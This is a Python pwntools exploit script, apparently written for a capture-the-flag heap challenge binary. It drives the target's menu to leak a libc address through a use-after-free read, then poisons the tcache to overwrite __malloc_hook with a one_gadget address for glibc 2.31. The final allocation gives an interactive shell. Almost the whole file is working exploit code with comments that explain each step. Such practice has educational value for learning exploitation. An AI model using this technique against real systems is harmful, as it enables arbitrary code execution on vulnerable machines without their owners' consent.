from pwn import *

# pwntools' "debug" level prints every byte sent to / received from the target.
# Handy while developing the exploit, but very noisy, and the full transcript
# (including the libc leak) ends up in whatever captures stdout.
context.log_level = "debug"
# gdb.attach() opens the debugger in a new Windows Terminal tab running WSL --
# this is a Windows/WSL-specific setting and needs changing on a native Linux
# host (e.g. ["tmux", "splitw", "-h"]).
context.terminal = ["wt.exe", "wsl"]
# The target's libc, expected next to this script; every offset below
# (leak offset, one_gadget addresses) is tied to this exact build.
libc = ELF("libc.so.6")


def get_p(file):
    """Load *file* as an ELF, start it as a local process, return (tube, ELF)."""
    binary = ELF(file)
    tube = binary.process()
    return tube, binary
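def debug(tube=None):
    """Pause, attach gdb to *tube* (default: the global ``p``), then wait 2s.

    ``pause()`` blocks until you press a key, so you can set things up before
    the script continues; the ``sleep(2)`` gives gdb time to attach before the
    next I/O is sent. gdb is launched in the terminal configured by
    ``context.terminal`` at the top of the file.

    The tube is a parameter (defaulting to the global ``p``) so the helper
    still works as ``debug()`` but can also be pointed at a different process.
    """
    if tube is None:
        tube = p
    pause()
    gdb.attach(tube)
    sleep(2)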
# Global tube and ELF shared by every helper below; the target binary is
# expected to live next to this script.
p, elf = get_p("./Heap")
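# Template for adding another menu wrapper. This used to be a bare ''' ... '''
# string statement -- which Python evaluates and discards rather than treating
# as a comment -- so it is kept here as a real comment instead:
# def xxx():
#     p.sendlineafter()
#     p.sendlineafter()
#     p.sendlineafter()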
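def add_heap(size, content):
    """Menu option 1: allocate a chunk of *size* bytes and write *content* to it.

    The "adventurer? " prompt is answered with "1" twice before the size
    prompt appears (the wording of the second prompt is not visible here --
    it is simply what the original script waits on). ``content`` is sent with
    ``sendline``, so a trailing "\\n" is written after it; keep that in mind
    when the payload has to be exactly *size* bytes.
    """
    p.sendlineafter(b"adventurer? ", b"1")
    p.sendlineafter(b"adventurer? ", b"1")
    # Send bytes consistently instead of mixing str and bytes; pwntools would
    # encode a str for us, but the rest of the file uses bytes throughout.
    p.sendlineafter(b"bytes): ", str(size).encode())
    p.sendlineafter(b"bytes):\n", content)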
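def free_heap(idx):
    """Menu option 2: free the chunk stored at slot *idx*.

    The exploit below shows and edits slots after freeing them, so the target
    presumably keeps the dangling pointer around (use-after-free) -- that is
    the primitive everything else is built on.
    """
    p.sendlineafter(b"adventurer? ", b"2")
    # bytes, for consistency with the other prompts/answers in this file
    p.sendlineafter(b": ", str(idx).encode())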
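def edit_heap(idx, content):
    """Menu option 3: overwrite the chunk at slot *idx* with *content*.

    Used on a freed slot below, which is what lets the exploit rewrite a
    tcache ``fd`` pointer. ``content`` goes through ``sendline``, so a "\\n"
    follows it on the wire.
    """
    p.sendlineafter(b"adventurer? ", b"3")
    # bytes, for consistency with the other prompts/answers in this file
    p.sendlineafter(b": ", str(idx).encode())
    p.sendlineafter(b":\n", content)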
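def show_heap(idx):
    """Menu option 4: ask the target to print the chunk at slot *idx*.

    Only issues the request; the caller is expected to read the reply from
    ``p`` (see the libc leak below, which reads it after a free).
    """
    p.sendlineafter(b"adventurer? ", b"4")
    # bytes, for consistency with the other prompts/answers in this file
    p.sendlineafter(b": ", str(idx).encode())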
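# Leak libc. Two chunks above the tcache limit (0x408 bytes): freeing the
# first should put it in the unsorted bin with fd/bk pointing into libc's
# main_arena, and the second keeps it from being merged into the top chunk.
# (Assumes the target allocates roughly the requested size -- confirm if the
# leak comes back empty.)
add_heap(0x440, b"A")
add_heap(0x440, b"A")
free_heap(0)
show_heap(0)  # read-after-free: expected to print the unsorted-bin fd

# Take the 6 significant bytes of the pointer (the 0x7f top byte of a
# userland x86-64 pointer is the last one on the wire) and rebase libc.
# 0x1ebbe0 is main_arena+96 on the Ubuntu 20.04 glibc 2.31 builds this script
# appears to target; it must match the shipped libc.so.6.
leaked = p.recvuntil(b"\x7f")[-6:]
libc.address = u64(leaked.ljust(8, b"\x00")) - 0x1ebbe0
# Sanity check: a wrong offset or a different libc build shows up here as an
# unaligned base, rather than later as a crash on the write to __malloc_hook.
if libc.address & 0xfff:
    log.warning("libc base %#x is not page aligned -- wrong libc/offset?" % libc.address)
log.success("libc =" + hex(libc.address))
malloc_hook = libc.sym["__malloc_hook"]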
# Tcache poisoning: two small chunks land in slots 2 and 3; freeing 2 then 3
# makes 3 the tcache head, and the post-free edit repoints its fd at
# __malloc_hook. This only works while tcache stores raw next pointers,
# i.e. glibc < 2.32 (no safe-linking) -- consistent with the 2.31 offsets used
# elsewhere in this script, but confirm against the actual libc.
for _ in range(2):
    add_heap(0x10, b"A")
free_heap(2)
free_heap(3)
edit_heap(3, p64(malloc_hook))
# one_gadget candidates for this libc build (offsets tied to the exact
# libc.so.6); only the second one is used. Each gadget has register/stack
# preconditions -- if the target dies instead of giving a shell, try the
# other two.
one_gadgets = [0xe6c7e, 0xe6c81, 0xe6c84]
og = libc.address + one_gadgets[1]
# The first allocation drains the poisoned tcache head (slot 3); the second
# is served from __malloc_hook itself, so its "content" overwrites the hook.
# The newline that sendline appends lands at __malloc_hook+8 -- presumably
# harmless padding, but confirm against the libc layout.
add_heap(0x10, b"A")
add_heap(0x10, p64(og))
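# Trigger: the next malloc runs the one_gadget via __malloc_hook. Note this
# answers "adventurer? " only once, whereas add_heap answers it twice before
# the size prompt -- if that second prompt is really required, the
# sendlineafter below will block; confirm against the target's menu flow.
p.sendlineafter(b"adventurer? ", b"1")  # bytes, like the rest of the file
p.sendlineafter(b"bytes): ", b"10")
p.interactive()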